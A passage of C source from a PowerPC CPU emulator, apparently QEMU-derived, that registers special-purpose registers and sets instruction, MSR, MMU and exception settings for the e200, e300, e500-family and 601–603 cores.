SPR_Exxx_DBCR3, "DBCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CFG0, "L1CFG0", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CSR0, "L1CSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1FINV0, "L1FINV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_TLB0CFG, "TLB0CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_TLB1CFG, "TLB1CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MMUCSR0, "MMUCSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* TOFIX */ spr_register(env, SPR_BOOKE_DSRR0, "DSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR1, "DSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); env->nb_tlb = 64; env->nb_ways = 1; env->id_tlbs = 0; env->tlb_type = TLB_EMB; init_excp_e200(env, 0xFFFF0000UL); env->dcache_line_size = 32; env->icache_line_size = 32; /* XXX: TODO: allocate internal IRQ controller */ } POWERPC_FAMILY(e200)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e200 core"; pcc->init_proc = init_proc_e200; pcc->check_pow = check_pow_hid0; /* * XXX: unimplemented instructions: * dcblc * dcbtlst * dcbtstls * icblc * icbtls * tlbivax * all SPE multiply-accumulate instructions */ pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_BOOKE; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e300(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DABR2, "DABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR2, "IABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IBCR, "IBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DBCR, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(e300)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e300 core"; pcc->init_proc = init_proc_e300; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_AL) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_603; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void spr_write_mas73(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv val = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, val, cpu_gpr[gprn]); gen_store_spr(tcg_ctx, SPR_BOOKE_MAS3, val); tcg_gen_shri_tl(tcg_ctx, val, cpu_gpr[gprn], 32); gen_store_spr(tcg_ctx, SPR_BOOKE_MAS7, val); tcg_temp_free(tcg_ctx, val); } static void spr_read_mas73(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv mas7 = tcg_temp_new(tcg_ctx); TCGv mas3 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, mas7, SPR_BOOKE_MAS7); tcg_gen_shli_tl(tcg_ctx, mas7, mas7, 32); gen_load_spr(tcg_ctx, mas3, SPR_BOOKE_MAS3); tcg_gen_or_tl(tcg_ctx, cpu_gpr[gprn], mas3, mas7); tcg_temp_free(tcg_ctx, mas3); tcg_temp_free(tcg_ctx, mas7); } enum fsl_e500_version { fsl_e500v1, fsl_e500v2, fsl_e500mc, fsl_e5500, fsl_e6500, }; static void init_proc_e500(CPUPPCState *env, int version) { uint32_t tlbncfg[2]; uint64_t ivor_mask; uint64_t ivpr_mask = 0xFFFF0000ULL; uint32_t l1cfg0 = 0x3800 /* 8 ways */ | 0x0020; /* 32 kb */ uint32_t l1cfg1 = 0x3800 /* 8 ways */ | 0x0020; /* 32 kb */ uint32_t mmucfg = 0; int i; /* Time base */ gen_tbl(env); /* * XXX The e500 doesn't implement IVOR7 and IVOR9, but doesn't * complain when accessing them. * gen_spr_BookE(env, 0x0000000F0000FD7FULL); */ switch (version) { case fsl_e500v1: case fsl_e500v2: default: ivor_mask = 0x0000000F0000FFFFULL; break; case fsl_e500mc: case fsl_e5500: ivor_mask = 0x000003FE0000FFFFULL; break; case fsl_e6500: ivor_mask = 0x000003FF0000FFFFULL; break; } gen_spr_BookE(env, ivor_mask); gen_spr_usprg3(env); /* Processor identification */ spr_register(env, SPR_BOOKE_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_SPEFSCR, "SPEFSCR", &spr_read_spefscr, &spr_write_spefscr, &spr_read_spefscr, &spr_write_spefscr, 0x00000000); /* Memory management */ env->nb_pids = 3; env->nb_ways = 2; env->id_tlbs = 0; switch (version) { case fsl_e500v1: tlbncfg[0] = gen_tlbncfg(2, 1, 1, 0, 256); tlbncfg[1] = gen_tlbncfg(16, 1, 9, TLBnCFG_AVAIL | TLBnCFG_IPROT, 16); break; case fsl_e500v2: tlbncfg[0] = gen_tlbncfg(4, 1, 1, 0, 512); tlbncfg[1] = gen_tlbncfg(16, 1, 12, TLBnCFG_AVAIL | TLBnCFG_IPROT, 16); break; case fsl_e500mc: case fsl_e5500: tlbncfg[0] = gen_tlbncfg(4, 1, 1, 0, 512); tlbncfg[1] = gen_tlbncfg(64, 1, 12, TLBnCFG_AVAIL | TLBnCFG_IPROT, 64); break; case fsl_e6500: mmucfg = 0x6510B45; env->nb_pids = 1; tlbncfg[0] = 0x08052400; tlbncfg[1] = 0x40028040; break; default: cpu_abort(env_cpu(env), "Unknown CPU: " TARGET_FMT_lx "\n", env->spr[SPR_PVR]); } /* Cache sizes */ switch (version) { case fsl_e500v1: case fsl_e500v2: env->dcache_line_size = 32; env->icache_line_size = 32; break; case fsl_e500mc: case fsl_e5500: env->dcache_line_size = 64; env->icache_line_size = 64; l1cfg0 |= 0x1000000; /* 64 byte cache block size */ l1cfg1 |= 0x1000000; /* 64 byte cache block size */ break; case fsl_e6500: env->dcache_line_size = 32; env->icache_line_size = 32; l1cfg0 |= 0x0F83820; l1cfg1 |= 0x0B83820; break; default: cpu_abort(env_cpu(env), "Unknown CPU: " TARGET_FMT_lx "\n", env->spr[SPR_PVR]); } gen_spr_BookE206(env, 0x000000DF, tlbncfg, mmucfg); /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BBEAR, "BBEAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BBTAR, "BBTAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_MCAR, "MCAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_MCSR, "MCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_NPIDR, "NPIDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_BUCSR, "BUCSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_Exxx_L1CFG0, "L1CFG0", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, l1cfg0); spr_register(env, SPR_Exxx_L1CFG1, "L1CFG1", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, l1cfg1); spr_register(env, SPR_Exxx_L1CSR0, "L1CSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_e500_l1csr0, 0x00000000); spr_register(env, SPR_Exxx_L1CSR1, "L1CSR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_e500_l1csr1, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR0, "MCSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MCSRR1, "MCSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_MMUCSR0, "MMUCSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke206_mmucsr0, 0x00000000); spr_register(env, SPR_BOOKE_EPR, "EPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX better abstract into Emb.xxx features */ if ((version == fsl_e5500) || (version == fsl_e6500)) { spr_register(env, SPR_BOOKE_EPCR, "EPCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_MAS7_MAS3, "MAS7_MAS3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_mas73, &spr_write_mas73, 0x00000000); ivpr_mask = (target_ulong)~0xFFFFULL; } if (version == fsl_e6500) { /* Thread identification */ spr_register(env, SPR_TIR, "TIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_BOOKE_TLB0PS, "TLB0PS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000004); spr_register(env, SPR_BOOKE_TLB1PS, "TLB1PS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x7FFFFFFC); } env->nb_tlb = 0; env->tlb_type = TLB_MAS; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { env->nb_tlb += booke206_tlb_size(env, i); } init_excp_e200(env, ivpr_mask); /* Allocate hardware IRQ controller */ ppce500_irq_init(env_archcpu(env)); } static void init_proc_e500v1(CPUPPCState *env) { init_proc_e500(env, fsl_e500v1); } POWERPC_FAMILY(e500v1)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e500v1 core"; pcc->init_proc = init_proc_e500v1; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC; pcc->insns_flags2 = PPC2_BOOKE206; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e500v2(CPUPPCState *env) { init_proc_e500(env, fsl_e500v2); } POWERPC_FAMILY(e500v2)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e500v2 core"; pcc->init_proc = init_proc_e500v2; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_SPE | PPC_SPE_SINGLE | PPC_SPE_DOUBLE | PPC_WRTEE | PPC_RFDI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC; pcc->insns_flags2 = PPC2_BOOKE206; pcc->msr_mask = (1ull << MSR_UCLE) | (1ull << MSR_SPE) | (1ull << MSR_POW) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DWE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR); #if 0 pcc->mmu_model = POWERPC_MMU_BOOKE206; #else /* disable mmu */ pcc->mmu_model = POWERPC_MMU_REAL; #endif pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_SPE | POWERPC_FLAG_CE | POWERPC_FLAG_UBLE | POWERPC_FLAG_DE | POWERPC_FLAG_BUS_CLK; } static void init_proc_e500mc(CPUPPCState *env) { init_proc_e500(env, fsl_e500mc); } POWERPC_FAMILY(e500mc)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e500mc core"; pcc->init_proc = init_proc_e500mc; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE | PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC; pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL; pcc->msr_mask = (1ull << MSR_GS) | (1ull << MSR_UCLE) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PX) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; /* FIXME: figure out the correct flag for e500mc */ pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #ifdef TARGET_PPC64 static void init_proc_e5500(CPUPPCState *env) { init_proc_e500(env, fsl_e5500); } POWERPC_FAMILY(e5500)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e5500 core"; pcc->init_proc = init_proc_e5500; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE | PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC | PPC_64B | PPC_POPCNTB | PPC_POPCNTWD; pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL | PPC2_PERM_ISA206 | \ PPC2_FP_CVT_S64; pcc->msr_mask = (1ull << MSR_CM) | (1ull << MSR_GS) | (1ull << MSR_UCLE) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PX) | (1ull << MSR_RI); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; /* FIXME: figure out the correct flag for e5500 */ pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_e6500(CPUPPCState *env) { init_proc_e500(env, fsl_e6500); } POWERPC_FAMILY(e6500)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "e6500 core"; pcc->init_proc = init_proc_e6500; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_ISEL | PPC_MFTB | PPC_WRTEE | PPC_RFDI | PPC_RFMCI | PPC_CACHE | PPC_CACHE_LOCK | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_CACHE_DCBA | PPC_FLOAT | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX | PPC_WAIT | PPC_MEM_TLBSYNC | PPC_TLBIVAX | PPC_MEM_SYNC | PPC_64B | PPC_POPCNTB | PPC_POPCNTWD | PPC_ALTIVEC; pcc->insns_flags2 = PPC2_BOOKE206 | PPC2_PRCNTL | PPC2_PERM_ISA206 | \ PPC2_FP_CVT_S64 | PPC2_ATOMIC_ISA206; pcc->msr_mask = (1ull << MSR_CM) | (1ull << MSR_GS) | (1ull << MSR_UCLE) | (1ull << MSR_CE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IS) | (1ull << MSR_DS) | (1ull << MSR_PX) | (1ull << MSR_RI) | (1ull << MSR_VR); pcc->mmu_model = POWERPC_MMU_BOOKE206; pcc->excp_model = POWERPC_EXCP_BOOKE; pcc->bus_model = PPC_FLAGS_INPUT_BookE; pcc->flags = POWERPC_FLAG_CE | POWERPC_FLAG_DE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_VRE; } #endif /* Non-embedded PowerPC */ #define POWERPC_MSRR_601 (0x0000000000001040ULL) static void init_proc_601(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_601(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_hid0_601, 0x80010080); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_601_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_601_HID5, "HID5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ init_excp_601(env); /* * XXX: beware that dcache line size is 64 * but dcbz uses 32 bytes "sectors" * XXX: this breaks clcs instruction ! */ env->dcache_line_size = 32; env->icache_line_size = 64; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(601)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 601"; pcc->init_proc = init_proc_601; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_POWER_BR | PPC_FLOAT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_601; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_601; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_RTC_CLK; } #define POWERPC_MSRR_601v (0x0000000000001040ULL) static void init_proc_601v(CPUPPCState *env) { init_proc_601(env); /* XXX : not implemented */ spr_register(env, SPR_601_HID15, "HID15", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } POWERPC_FAMILY(601v)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 601v"; pcc->init_proc = init_proc_601v; pcc->check_pow = check_pow_none; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_POWER_BR | PPC_FLOAT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR); pcc->mmu_model = POWERPC_MMU_601; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_RTC_CLK; } static void init_proc_602(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_602(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_602(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(602)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 602"; pcc->init_proc = init_proc_602; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_6xx_TLB | PPC_MEM_TLBSYNC | PPC_SEGMENT | PPC_602_SPEC; pcc->msr_mask = (1ull << MSR_VSX) | (1ull << MSR_SA) | (1ull << MSR_POW) | (1ull << MSR_TGPR) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_RI) | (1ull << MSR_LE); /* XXX: 602 MMU is quite specific. Should add a special case */ pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_602; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_TGPR | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_BUS_CLK; } static void init_proc_603(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_603(env); /* Time base */ gen_tbl(env); /* hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_603(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(603)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 603"; pcc->init_proc = init_proc_603; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | 